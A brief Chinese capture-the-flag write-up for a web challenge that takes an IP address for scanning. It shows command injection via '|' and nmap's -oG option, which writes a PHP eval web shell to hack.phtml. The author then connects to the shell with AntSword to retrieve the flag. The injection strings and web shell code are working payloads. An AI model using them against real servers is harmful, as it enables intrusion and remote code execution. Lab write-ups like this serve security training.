打开题目

 输入127.0.0.1

可以得到回显结果，猜测是命令执行，尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|被\转义，尝试使用;：

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml：

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址：127.0.0.1：

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表：

查看写入的文件，即访问hack.phtml

蚁剑连接

在根目录找到了flag